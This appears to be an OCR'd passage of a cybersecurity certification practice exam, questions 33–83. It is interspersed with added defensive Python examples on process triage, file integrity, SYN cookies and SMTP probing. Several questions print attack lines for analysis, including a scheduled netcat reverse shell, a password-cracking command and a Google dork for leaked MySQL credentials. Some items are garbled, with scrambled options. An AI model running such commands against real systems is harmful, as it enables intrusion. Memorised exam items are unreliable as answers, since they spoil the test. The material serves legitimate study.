[Figure: Alex’s scanning system, system A, and the protected internal network]

A. A reflection scan
B. A proxy scan
C. A randomized host scan
D. A ping-through scan
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33. Asa member of a blue team, John observed the following behavior during an external pen- 
etration test. What should he report to his managers at the conclusion of the test? 


34. 


35. 


999 > 


Network Latency & Packet Loss 


AMI (AWS) 
Apr 21 2017, 12:30 pm- Apr 22 2017, 12:30 pm 


Zoom lh 12h 24h 


INOS 


200 ms 1 


100 ms 5 
6:00 PM 22 Apr 6:00 AM 12:00 PM 


TIME IN MELLISECC 


JN 


ox # 
E 
OX O 





4 EB Response Time AMI (AWS) 
4 GB % Packet Loss AMI (AWS) 


solarwinds A 


A significant increase in latency 
A significant increase in packet loss 
Latency and packet loss both increased. 


No significant issues were observed. 


34. As part of an organization-wide red team exercise, Frank is able to use a known vulnerability to compromise an Apache web server. Once he has gained access, what should his next step be if he wants to use the system to pivot to protected systems behind the DMZ that the web server resides in?

A. Vulnerability scanning
B. Privilege escalation
C. Patching
D. Installing additional tools


35. As part of her malware analysis process, Caitlyn diagrams the high-level functions and processes that the malware uses to accomplish its goals. What is this process known as?

A. Static analysis
B. Composition
C. Dynamic analysis
D. Decomposition
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36. Alex has been asked to assess the likelihood of reconnaissance activities against her orga- 


nization (a small, regional business). Her first assignment is to determine the likelihood of 
port scans against systems in her organization’s DMZ. How should she rate the likelihood 
of this occurring? 


A. Low 
B. Medium 
C. High 


D. There is not enough information for Alex to provide a rating. 


Use the following scenario for the questions 37 through 39. 


Lucy is the SOC operator for her organization and is responsible for monitoring her 
organization’s SIEM and other security devices. Her organization has both domestic and inter- 
national sites, and many of their employees travel frequently. 


37. While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization’s New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?


A. Heuristic 


B. Behavior 
C. Availability 
D. Anomaly 


38. After her discovery in the first part of this question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows:

Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute.

The average administrator at Lucy’s organization is responsible for 150 to 300 machines.


What danger does Lucy’s alert create? 

A. A DDoS that causes administrators to not be able to access systems 

B. A network outage 

C. Administrators may ignore or filter the alerts. 

D. A memory spike 

39. Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?

A. Trend
B. Availability
C. Heuristic
D. Behavior
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40. During his analysis of a malware sample, John reviews the malware files and binaries 
without running them. What type of analysis is this? 


41. 


42. 


A. 
B. 
C. 
D. 


Automated analysis 
Dynamic analysis 
Static analysis 


Heuristic analysis 


41. The company that Lauren works for is making significant investments in infrastructure-as-a-service hosting to replace its traditional data center. Members of her organization’s management have expressed concerns about data remanence when Lauren’s team moves from one virtual host to another in their cloud service provider’s environment. What should she instruct her team to do to avoid this concern?

A. Zero-wipe drives before moving systems.
B. Use full-disk encryption.
C. Use data masking.
D. Span multiple virtual disks to fragment data.


42. Lucca wants to prevent workstations on his network from attacking each other. If Lucca’s corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?

[Figure: network diagram showing a Border Router and a Firewall]
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43. Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables 
firewall. Which of the following commands is not one of the three iptables commands 
needed to perform this action? 


A. #iptables-policy INPUT DROP 

B. #iptables-policy SERVICE DROP 
C. #iptables-policy OUTPUT DROP 
D. #iptables-policy FORWARD DROP 


44. The company that Dan works for has recently migrated to a SaaS provider for its enter- 
prise resource planning (ERP) software. In its traditional on-site ERP environment, Dan 
conducted regular port scans to help with security validation for the systems. What will 
Dan most likely have to do in this new environment? 


A. Use a different scanning tool. 
B. Rely on vendor testing and audits. 
C. Engage a third-party tester. 


D. Use a VPN to scan inside the vendor’s security perimeter. 


45. Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device?

192.168.137.85 [Leonardo-PC] (Windows)
  IP: 192.168.137.85
  MAC: 80C16E6A0BF2
  NIC Vendor: Hewlett Packard
  Hostname: Leonardo-PC
  OS: Windows
  TTL: 128 (distance: 0)
  Open TCP Ports:
  Sent: 34184 packets (1,819,097 Bytes), 0.00 % cleartext (0 of 0 Bytes)
  Received: 39571 packets (52,922,088 Bytes), 0.00 % cleartext (0 of 0 Bytes)
  Incoming sessions: 0
  Outgoing sessions: 675
  Host Details

A. The MAC address
B. The OS flags
C. The system’s banner
D. The IP address
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46. Laura’s organization has been receiving a large amount of spam email sent specifically to 
the email addresses listed in her organization’s domain registrations. Which of the follow- 
ing techniques will help her organization limit this type of spam? 


A. DNS query rate limiting 
B. CAPTCHAs 

C. Using a proxy service 

D. Blacklisting 


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Eric believes that his organization has a number of vulnerable systems that have been 
scanned by third parties. If he wants to check publicly available vulnerability information, 
which of the following methods are best suited to performing this type of passive 
reconnaissance? 


A. Use the worldwide nmap database. 

B. Search for his domain in Shodan. 

C. Use the OpenVAS central vulnerability data repository. 
D. Check against the CVE database for his domain. 


48. Adam knows that netcat is a useful penetration testing tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool?


A. File transfer 
B. Port scanner 
C. Encrypted shell 
D. Reverse shell 


49. Which of the following tools can be used to passively gather the information required to generate a network topology map?


A. Wireshark 


B. nmap 
C. SolarWinds Network Mapper 
D. Nessus 


50. Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches?


A. Google whacks 

B. SuperGoogles 

C. Google dorks 

D. Google gizmos 

51. What type of control review will focus on change management as a major element in its assessment scope?

A. Operational control review
B. Technical control review
C. Detective control review
D. Responsive control review
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52. As part of her reconnaissance process for her organization’s internal security review, 
Olivia uses Shodan to search for hosts within her target’s IP range. She discovers the fol- 
lowing Shodan entry listing for one of her target’s devices. What should she do with this 
information? 


53. 


54. 


55. 


Ow > 


D. 


23 c 





telnet Cisco Configuration Professional (Cisco CP) is installed on this device. 
This feature requires the one-time use of the username "cisco" with the 
password "cisco". These default credentials have a privilege level of 15. 


Activate the incident response process. 
Contact the device administrator. 
Log in to validate the finding. 


Nothing, because this is a false positive. 


53. Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?

A. Use sha1sum to generate a hash for the file and write a script to check it periodically.
B. Install and use Tripwire.
C. Periodically check the MAC information for the file using a script.
D. Encrypt the file and keep the key secret so the file cannot be modified.


54. Selah has been tasked with gathering information to increase her penetration testing team’s understanding of their customer’s Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs?

A. nmap
B. theHarvester
C. Shodan
D. osint-ng


55. While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?

[Figure: Wireshark capture. Packet list: frames 1 through 36 at one-second intervals (0.000000 to 15.013464 s) between 10.0.0.x hosts, Protocol ESP, Length 198, Info “ESP (SPI=0x0000000a)”. Packet details pane for a selected frame: Internet Protocol Version 4, Header Length 20 bytes, Differentiated Services Field 0x00 (DSCP: CS0, ECN: Not-ECT), Total Length 72, Identification 0x0000, Flags 0x02 (Don’t Fragment), Fragment offset 0, Time to live 255, Protocol UDP (17), Header checksum 0x90a8 [validation disabled], Source 10.0.0.1, Destination 224.0.0.251; User Datagram Protocol, Src Port 5353, Dst Port 5353; Multicast Domain Name System; followed by the frame’s hex dump.]

A. An encrypted RAT
B. A VPN application
C. A secure web browser
D. A base64-encoded packet transfer utility
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Ben wants to quickly check a suspect binary file for signs of its purpose or other informa- 


tion that it may contain. What Linux tool can quickly show him potentially useful infor- 


mation contained in the file? 


A. 


B. 
C. 
D 


grep 
more 
less 


strings 
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57. While investigating a malware infection, Lauren discovers that the hosts file for the system 
she is reviewing contains multiple entries, as shown here: 


0.0.0.0 symantec.com 
0.0.0.0 mcafee.com 
0.0.0.0 microsoft.com 
0.0.0.0 kapersky.com 


Why would the malware make this change? 
A. To redirect 0.0.0.0 to known sites 
B. To prevent antivirus updates 
C. To prevent other attackers from compromising the system 
D. To enable remote access to the system 
58. Alice believes that one of her users may be taking malicious action on the systems she has 


access to. When she walks past her user’s desktop, she sees the following command on the 
screen: 


user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt

What is the user attempting to do? 

A. They are attempting to hash a file. 

B. They are attempting to crack hashed passwords. 

C. They are attempting to crack encrypted passwords. 

D. They are attempting a pass-the-hash attack. 


59. nmap provides a standardized way to name hardware and software that it detects. What is 


this called? 

A. CVE 

B. HardwareEnum 
C. CPE 


D. GearScript 


60. Charles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do?

A. Search for use of privileged ports in sequential order.
B. Search for connections to ports in the /var/syslog directory.
C. Log all kernel messages to detect scans.
D. Install additional tools that can detect scans and send the logs to syslog.


61. Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this?


A. nbtstat -o 
B. nbtstat -r 
C. nbtstat -s 
D. nbtstat -c 


62. Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.

USER       PID %CPU    VSZ   RSS START COMMAND
root       507  0.0 258268  3288 15:52 /usr/sbin/rsyslogd -n
message+   508  0.0  44176  5160 15:52 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root       523  0.0 281092  6312 15:52 /usr/lib/accountsservice/accounts-daemon
root       524  0.0 389760 15956 15:52 /usr/sbin/NetworkManager --no-daemon
root       527  0.0  28432  2992 15:52 /lib/systemd/systemd-logind
apache     714  0.0  27416  2748 15:52 /www/temp/webmin
root       617  0.0  19312  2056 15:52 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root       644  0.0 245472  2444 15:52 /usr/sbin/VBoxService
root       653  0.0  12828  1848 15:52 /sbin/agetty --noclear tty1 linux
root       661  0.0 285428  8088 15:52 /usr/lib/policykit-1/polkitd --no-debug
root       663  0.0 364752  7600 15:52 /usr/sbin/gdm3
root       846  0.0 285816 10884 15:52 /usr/lib/upower/upowerd
root       847  0.0 235180  7272 15:52 gdm-session-worker [pam/gdm-launch-environment]
Debian-+   877  0.0  46892  4816 15:52 /lib/systemd/systemd --user
Debian-+   878  0.0  62672  1596 15:52 (sd-pam)

A. 508
B. 617
C. 846
D. 714
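Spotting the odd process in a listing of fifteen is easy; doing it across a fleet needs the same judgement written down. The script below is an added example, not code from the original page: it parses standard `ps aux` output and flags executables running from writable or web-served directories, binaries outside the usual system paths, and known daemons running as an unexpected account. The sample listing is constructed for the example, mirrors the question’s output (including the webmin process in /www/temp) and adds two further rows to exercise the other checks; the expected-user table is an assumed baseline.

```python
"""Triage `ps aux` output for processes that do not belong.

Added example (not from the original page). The sample output below is
constructed; the first rows mirror the question's listing and the last two
rows were added to exercise the /tmp and wrong-user checks.
"""
import shlex

SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root       507  0.0  0.1 258268  3288 ?        Ssl  15:52   0:00 /usr/sbin/rsyslogd -n
message+   508  0.0  0.1  44176  5160 ?        Ss   15:52   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root       523  0.0  0.1 281092  6312 ?        Ssl  15:52   0:00 /usr/lib/accountsservice/accounts-daemon
root       524  0.0  0.3 389760 15956 ?        Ssl  15:52   0:00 /usr/sbin/NetworkManager --no-daemon
root       527  0.0  0.0  28432  2992 ?        Ss   15:52   0:00 /lib/systemd/systemd-logind
apache     714  0.0  0.0  27416  2748 ?        Ss   15:52   0:00 /www/temp/webmin
root       617  0.0  0.0  19312  2056 ?        Ss   15:52   0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root       644  0.0  0.0 245472  2444 ?        Sl   15:52   0:01 /usr/sbin/VBoxService
root       846  0.0  0.1 235180  7272 ?        Ssl  15:52   0:00 /usr/sbin/gdm3
www-data   901  0.0  0.2  51200  9000 ?        S    15:58   0:02 /tmp/.x/kworkerds -o pool.example:3333
nobody     905  0.0  0.0  19312  2056 ?        S    15:59   0:00 /usr/sbin/rsyslogd -n
"""

TRUSTED_PREFIXES = ("/usr/sbin/", "/usr/bin/", "/usr/lib/", "/lib/", "/sbin/", "/bin/")
SUSPICIOUS_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/www/", "/var/www/", "/home/")

# Account each known daemon is expected to run as (assumed baseline for the example)
EXPECTED_USER = {"rsyslogd": "root", "NetworkManager": "root", "dbus-daemon": "message+"}


def parse_ps(text):
    """Parse `ps aux` rows into dicts; COMMAND may contain spaces, so split at most 10 times."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 10)
        if len(parts) < 11:
            continue
        rows.append({"user": parts[0], "pid": int(parts[1]), "command": parts[10]})
    return rows


def triage(rows):
    """Return (pid, reason, executable) for every row that trips a check."""
    findings = []
    for row in rows:
        argv = shlex.split(row["command"])
        if not argv:
            continue
        exe = argv[0]
        name = exe.rsplit("/", 1)[-1]
        if exe.startswith(SUSPICIOUS_PREFIXES):
            findings.append((row["pid"], "binary in writable/web path", exe))
        elif exe.startswith("/") and not exe.startswith(TRUSTED_PREFIXES):
            findings.append((row["pid"], "binary outside trusted paths", exe))
        expected = EXPECTED_USER.get(name)
        if expected and row["user"] != expected:
            findings.append((row["pid"], f"unexpected user {row['user']} (expected {expected})", exe))
    return findings


def suspicious_pids(text):
    return sorted({pid for pid, _, _ in triage(parse_ps(text))})


if __name__ == "__main__":
    for pid, reason, exe in triage(parse_ps(SAMPLE_PS)):
        print(f"PID {pid:5}  {reason:45}  {exe}")
```

On a live system, pipe `ps aux` into parse_ps and extend EXPECTED_USER from a known-good host; a web server account executing anything at all outside its document root is the pattern the question is testing for.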
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63. While reviewing the filesystem of a potentially compromised system, Angela sees the fol- 


64. 


65. 


66. 


lowing output when running ls -la. What should her next action be after seeing this? 


rwxr-xr-x 1 root root 57 Mar 1 2013 paros 
rwxr-xr-x 1 root root 22256 May 13 2015 parse-edid 
rwxr-xr-x 1 root root 77248 Nov 2 2015 partx 

Lrwxrwxrwx 1 root root 15 Jan 28 2016 passmass -> expect_passmass 
rwsr-xr-x 1 root root 50000 Aug 5 18:23 
rwxr-xr-x 1 root root 31240 Jan 18 2016 paste 
rwxr-xr-x 1 root root 67 May 16 2013 paster 
rwxr-xr-x 1 root root 70 May 16 2013 paster2.7 
rwxr-xr-x 1 root root 14792 Nov 6 2015 pasuspender 
rwxr-xr-x 1 root root 128629 Jan 28 2016 patator 
rwxr-xr-x 1 root root 151272 Mar 7 2015 patch 

Lrwxrwxrwx 1 root root 3 Jan 28 2016 patchwork -> dot 
rwxr-xr-x 1 root root 31032 Dec 12 2015 patgen 
rwxr-xr-x 1 root root 31240 Jan 18 2016 pathchk 
rwxr-xr-x 1 root root 14648 Nov 6 2015 paxllpublish 


Continue to search for other changes. 


Run diff against the password file. 


Oo wo > 


Immediately change her password. 

D. Check the passwd binary against a known good version. 
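Questions 53 and 63 are two sides of the same control: record what a file looked like, then notice when it differs. The following Python is an added example, not code from the original page, from Tripwire or from any other product. It does what option A of question 53 describes (hash the file and check it later, using SHA-256 rather than SHA-1 because SHA-1 collisions are now practical) and also records the permission bits and modification time, so a binary that acquires a setuid bit and a fresh timestamp, the situation in question 63, is reported even if its size is unchanged. The demo builds a throwaway directory with two fake binaries; the paths and file contents are the example’s own.

```python
"""File integrity baseline with setuid detection.

Added example (not from the original page or Tripwire). `fingerprint`
records content hash, permission bits and mtime; `verify` reports every
deviation from a saved baseline. `demo` creates constructed sample files
in a temporary directory and tampers with one of them.
"""
import hashlib
import os
import stat
import tempfile


def fingerprint(path):
    """SHA-256 of the contents plus mode bits and mtime; mode bits catch setuid changes."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    st = os.lstat(path)
    return {"sha256": h.hexdigest(), "mode": stat.S_IMODE(st.st_mode), "mtime": int(st.st_mtime)}


def baseline(paths):
    """Snapshot a set of files; store the result somewhere the attacker cannot write."""
    return {p: fingerprint(p) for p in paths}


def verify(base):
    """Return {path: [deviations]} for every file that no longer matches the baseline."""
    problems = {}
    for path, known in base.items():
        if not os.path.exists(path):
            problems[path] = ["missing"]
            continue
        now = fingerprint(path)
        issues = []
        if now["sha256"] != known["sha256"]:
            issues.append("content changed")
        if now["mode"] != known["mode"]:
            issues.append(f"mode changed {known['mode']:o} -> {now['mode']:o}")
        if now["mode"] & stat.S_ISUID and not known["mode"] & stat.S_ISUID:
            issues.append("setuid bit added")
        if now["mtime"] != known["mtime"]:
            issues.append("mtime changed")
        if issues:
            problems[path] = issues
    return problems


def demo():
    """Constructed scenario: baseline two fake binaries, then backdoor one and make it setuid."""
    d = tempfile.mkdtemp()
    paste = os.path.join(d, "paste")
    passwd = os.path.join(d, "passwd")
    for p in (paste, passwd):
        with open(p, "wb") as f:
            f.write(b"#!/bin/sh\necho legitimate\n")
        os.chmod(p, 0o755)
    base = baseline([paste, passwd])
    before = verify(base)                       # nothing has changed yet
    with open(passwd, "wb") as f:               # attacker swaps in a trojaned binary
        f.write(b"#!/bin/sh\necho backdoor\n")
    os.chmod(passwd, 0o4755)                    # and makes it setuid
    os.utime(passwd, (1, 1))                    # distinct mtime so the demo is deterministic
    return {"before": before, "after": verify(base)}


if __name__ == "__main__":
    result = demo()
    print("clean run:", result["before"])
    for path, issues in result["after"].items():
        print(path, "->", ", ".join(issues))
```

The MAC-time check alone (option C of question 53) would have missed a replacement whose timestamp was reset with touch; the hash and mode comparison would not.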

64. Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with an ACK, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using?


A. SYN cookies 
B. ACK-ACK 

C. TCP frogging 
D. SYN replay 
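The trick that makes this work is that the server never has to remember the SYN: everything it needs is packed into the sequence number it sends back. The code below is an added example, not from the original page or from any operating system’s TCP stack. It follows the field layout popularised by the Linux implementation (a 5-bit 32-second time counter, a 3-bit MSS index and a 24-bit keyed hash of the connection 4-tuple) but the secret, MSS table and freshness window are the example’s own assumptions. When the client’s ACK arrives, the acknowledgement number minus one is the cookie; the server recomputes the hash, rejects stale or forged values, and only then rebuilds the connection entry.

```python
"""SYN cookies: stateless SYN-ACK sequence numbers the server verifies later.

Added example (not from the original page). Layout: 5-bit time counter |
3-bit MSS index | 24-bit HMAC of (saddr, daddr, sport, dport, counter).
SECRET, MSS_TABLE and MAX_AGE_TICKS are the example's assumptions.
"""
import hashlib
import hmac
import os

MSS_TABLE = (536, 1300, 1440, 1460)   # index -> MSS the server will honour
SECRET = os.urandom(32)                # per-boot key; rotate in production
COUNTER_BITS, MSS_BITS, HASH_BITS = 5, 3, 24
MAX_AGE_TICKS = 2                      # accept cookies minted within the last 2 ticks (64 s)


def _counter(now):
    """32-second tick counter truncated to 5 bits (wraps roughly every 17 minutes)."""
    return (int(now) >> 5) & ((1 << COUNTER_BITS) - 1)


def _hash24(saddr, daddr, sport, dport, counter):
    msg = f"{saddr}|{daddr}|{sport}|{dport}|{counter}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(saddr, daddr, sport, dport, client_mss, now):
    """Server on SYN: compute the ISN for the SYN-ACK; no queue entry is kept."""
    fitting = [i for i, m in enumerate(MSS_TABLE) if m <= client_mss]
    mss_idx = fitting[-1] if fitting else 0
    counter = _counter(now)
    return ((counter << (MSS_BITS + HASH_BITS))
            | (mss_idx << HASH_BITS)
            | _hash24(saddr, daddr, sport, dport, counter))


def check_cookie(saddr, daddr, sport, dport, ack_number, now):
    """Server on ACK: return the negotiated MSS, or None if the cookie is forged or stale."""
    cookie = (ack_number - 1) & 0xFFFFFFFF
    counter = (cookie >> (MSS_BITS + HASH_BITS)) & ((1 << COUNTER_BITS) - 1)
    mss_idx = (cookie >> HASH_BITS) & ((1 << MSS_BITS) - 1)
    digest = cookie & ((1 << HASH_BITS) - 1)
    age = (_counter(now) - counter) & ((1 << COUNTER_BITS) - 1)
    if age > MAX_AGE_TICKS:
        return None                        # too old, or counter wrapped
    if digest != _hash24(saddr, daddr, sport, dport, counter):
        return None                        # forged, or replayed against another 4-tuple
    if mss_idx >= len(MSS_TABLE):
        return None
    return MSS_TABLE[mss_idx]


if __name__ == "__main__":
    t0 = 1_500_000_000
    isn = make_cookie("203.0.113.5", "198.51.100.1", 40000, 443, 1460, t0)
    print("SYN-ACK seq :", hex(isn))
    print("valid ACK   :", check_cookie("203.0.113.5", "198.51.100.1", 40000, 443, isn + 1, t0 + 3))
    print("forged ACK  :", check_cookie("203.0.113.5", "198.51.100.1", 40000, 443, isn + 2, t0 + 3))
    print("stale ACK   :", check_cookie("203.0.113.5", "198.51.100.1", 40000, 443, isn + 1, t0 + 200))
```

The cost of the scheme is visible in the layout: only the MSS survives, so window scaling and SACK options from the original SYN are lost unless the stack encodes them in the timestamp option, which is what Linux does.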


65. What two phases of the NIST penetration testing cycle are often repeated during a test? 
A. Planning and discovery 

B. Discovery and attack 

C. Planning and attack 

D. Discovery and reporting 

66. Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?

A. Enable host firewalls.
B. Install patches for those services.
C. Turn off the services for each appliance.
D. Place a network firewall between the devices and the rest of the network.


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Lauren is performing passive intelligence gathering and discovers a directory filled with 
photos taken by her target organization’s staff. If she wants to review the metadata from 
the photos, what tool can she use to do so? 


A. Strings 

B. Exiftool 

C. Wireshark 

D. Stegdetect 

68. Lauren’s network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command:


at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe 


What does it do? 

A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30. 

B. It uses the AT command to dial a remote host via NetBIOS. 

C. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30. 

D. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST. 

69. While conducting reconnaissance of his own organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management?

A. Self-signed certificates do not provide secure encryption for site visitors. 

B. Self-signed certificates can be revoked only by the original creator. 


C. Self-signed certificates will cause warnings or error messages. 
D. None of the above 


70. Isaac has access to a Windows system that is a member of the local Active Directory 
domain as part of his white-box penetration test. Which of the following commands might 
provide information about other systems on the network? 


A. net use 

B. net user 

C. net group 

D. net config 

71. During the reconnaissance stage of a penetration test, Fred calls a number of staff at the target organization. Using a script he prepared, Fred introduces himself as part of the support team for their recently installed software and asks for information about the software and its configuration. What is this technique called?


A. Pretexting 
B. OSINT 

C. A tag-out 
D. Profiling 
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72. Geoff needs to lock down a Windows workstation that has recently been scanned using 
nmap with the results shown here. He knows that the workstation needs to access websites 
and that the system is part of a Windows domain. What ports should he allow through the 
system’s firewall for externally initiated connections? 


root@kali:~# nmap -sS -P0 -p 0-65535 192.168.1.14


Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-25 21:08 EDT 
Nmap scan report for dynamo (192.168.1.14) 

Host is up (0.00023s latency). 

Not shown: 65524 filtered ports 

PORT STATE SERVICE 

80/tcp open http 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

902/tcp open iss-realsecure 

912/tcp open apex-mesh 

2869/tcp open icslap 

3389/tcp open ms-wbt-server 

5357/tcp open wsdapi 

7680/tcp open unknown 

22350/tcp open CodeMeter 

49677/tcp open unknown 

MAC Address: BC:5F:F4:7B:4B:7D (ASRock Incorporation) 


Nmap done: 1 IP address (1 host up) scanned in 105.78 seconds 


A. 80, 135, 139, and 445
B. 80, 445, and 3389
C. 135, 139, and 445
D. No ports should be open.
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73. Lucca wants to identify systems that may have been compromised and are being used for 
data exfiltration. Which of the following technologies should he put into place to capture 
data that he can analyze using his SIEM to find this behavior? 


A. A firewall 

B. A netflow collector 
C. A honeypot 

D. A BGP monitor 


74. During a white-box penetration test, Luke finds that he is suddenly unable to connect to 
the target network. What has likely happened? 


A. Automated shunning 
B. Network link failure 
C. Back-off algorithms 
D. A BGP route change 


75. Adam’s port scan returns results on six TCP ports: 22, 80, 443, 515, 631, and 9100. 
If Adam needs to guess what type of device this is based on these ports, what is his 
best guess? 


A. A web server 
B. An FTP server 


C. A printer
D. A proxy server


76. Cassandra believes that attackers were able to extract a volume shadow copy of a worksta- 
tion belonging to her organization’s Windows domain administrator. What information 
should she not report as being potentially exposed? 


A. All files on the user’s desktop
B. Password hashes
C. Domain details
D. Plain-text Windows account passwords


77. Lauren is contacted by a concerned administrator who notes that almost all of their Windows 10 Enterprise workstations are reporting the following issue after a patch deployment. What important policy may be missing?

[Figure: patch status report. “Items marked with [x] are confirmed missing. Items marked with [x*] are confirmed missing and are not approved by your system administrator.”
Score  ID       Description                                                                              Severity
[x]    4034658  2017-08 Cumulative Update for Windows 10 Version 1607 for x64-based Systems (KB4034658)  Critical
Detail: “Installation of this software update was not complete. You must restart your computer to …”]

A. Active hours
B. Required reboots
C. Automatic updates
D. Network time synchronization


78. Jarett needs to protect an application server against resource exhaustion attacks. Which of 
the following techniques is best suited to surviving a large-scale DDoS attack? 


A. Enable application sharding.
B. Review each query and implement query optimization.
C. Implement aggressive aging at the organization’s firewall.
D. Employ a CDN.


79. In his role as the SOC operator, Frank regularly scans a variety of servers in his organization. After two months of reporting multiple vulnerabilities on a Windows file server, Frank recently escalated the issue to the server administrator’s manager.

At the next weekly scan window, Frank noticed that all of the vulnerabilities were no longer active; however, ports 137, 139, and 445 were still showing as open. What most likely happened?

A. The server administrator blocked the scanner with a firewall.
B. The server was patched.
C. The vulnerability plug-ins were updated and no longer report false positives.
D. The system was offline.
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80. While conducting reconnaissance, Greg discovers what he believes is an SMTP service 
running on an alternate port. What technique should he use to manually validate his 
guess? 


A. Send an email via the open port. 
B. Send an SMTP probe. 

C. telnet to the port. 

D. ssh to the port. 
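The manual check Greg would do over telnet (connect, read the 220 greeting, send EHLO, expect a 250 reply) can be scripted. The block below is an added example, not code from the book: it probes a host and port and classifies the answer, and because it has to run offline it also starts a stand-in SMTP listener on a random loopback port plus a silent listener that behaves like a service (HTTP, for instance) that waits for the client to speak first, which is the case that trips up a naive banner grab. The hostnames in the banners are made up.

```python
import socket
import threading

# Constructed responses for the stand-in SMTP listener; the hostname is an
# assumption, not a real mail server.
FAKE_BANNER = b"220 mail.example.test ESMTP ready\r\n"
FAKE_EHLO_REPLY = b"250-mail.example.test\r\n250 SIZE 10240000\r\n"


def parse_smtp_reply(data: bytes):
    """Return the three-digit reply code that starts an SMTP response, else None."""
    first_line = data.split(b"\r\n", 1)[0]
    if len(first_line) >= 3 and first_line[:3].isdigit():
        return int(first_line[:3])
    return None


def probe_smtp(host: str, port: int, timeout: float = 3.0) -> dict:
    """Validate an SMTP guess the way a telnet session would: read the greeting,
    send EHLO, and require a 220 followed by a 250 before calling it SMTP."""
    result = {"banner": "", "greeting_code": None, "ehlo_code": None,
              "is_smtp": False, "error": None}
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            greeting = sock.recv(1024)          # SMTP speaks first; HTTP does not
            result["banner"] = greeting.decode("ascii", errors="replace").strip()
            result["greeting_code"] = parse_smtp_reply(greeting)
            if result["greeting_code"] != 220:
                return result
            sock.sendall(b"EHLO probe.example.test\r\n")
            result["ehlo_code"] = parse_smtp_reply(sock.recv(1024))
            sock.sendall(b"QUIT\r\n")
    except (socket.timeout, ConnectionError) as exc:
        result["error"] = type(exc).__name__
        return result
    result["is_smtp"] = result["ehlo_code"] == 250
    return result


def start_fake_smtp(port: int = 0) -> int:
    """One-shot stand-in SMTP service on 127.0.0.1 (port 0 = any free port)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", port))
    server.listen(1)

    def serve_once():
        conn, _ = server.accept()
        try:
            conn.sendall(FAKE_BANNER)
            if conn.recv(1024).upper().startswith(b"EHLO"):
                conn.sendall(FAKE_EHLO_REPLY)
                conn.recv(1024)                 # QUIT
                conn.sendall(b"221 Bye\r\n")
        except OSError:
            pass
        finally:
            conn.close()
            server.close()

    threading.Thread(target=serve_once, daemon=True).start()
    return server.getsockname()[1]


def start_silent_listener() -> int:
    """Stand-in for a service that never sends a greeting (client must talk first)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(1)

    def hold():
        conn, _ = server.accept()
        try:
            conn.recv(1024)
        finally:
            conn.close()
            server.close()

    threading.Thread(target=hold, daemon=True).start()
    return server.getsockname()[1]


if __name__ == "__main__":
    print(probe_smtp("127.0.0.1", start_fake_smtp()))
    print(probe_smtp("127.0.0.1", start_silent_listener(), timeout=0.5))
```

The greeting alone is not proof: a service on an odd port can print anything, so the EHLO round trip is what confirms the guess, and a timeout on the greeting is a signal in its own right (the service is probably client-first, not SMTP).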


81. Adam is reviewing his organization's security footprint by conducting reconnaissance
activities. After reviewing a list of Google dorks, he runs the following search:

"mysqli_connect" ext:inc

If it returns data, what should he recommend in his report to management?

A. Block MySQL connections from remote hosts.
B. Initiate the organization's incident response process.
C. Immediately change MySQL passwords and review configurations.
D. Change all MySQL connection strings.


82. Rick’s manager wants to present the most trustworthy certificate possible for a website. 
What type of certificate should Rick get? 


A. EV 
B. DV 
C. OV
D. IV 


83. While reviewing web server logs, Danielle notices the following entry. What occurred? 


10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme=total 200


A. A theme was changed. 

B. A file was not found. 

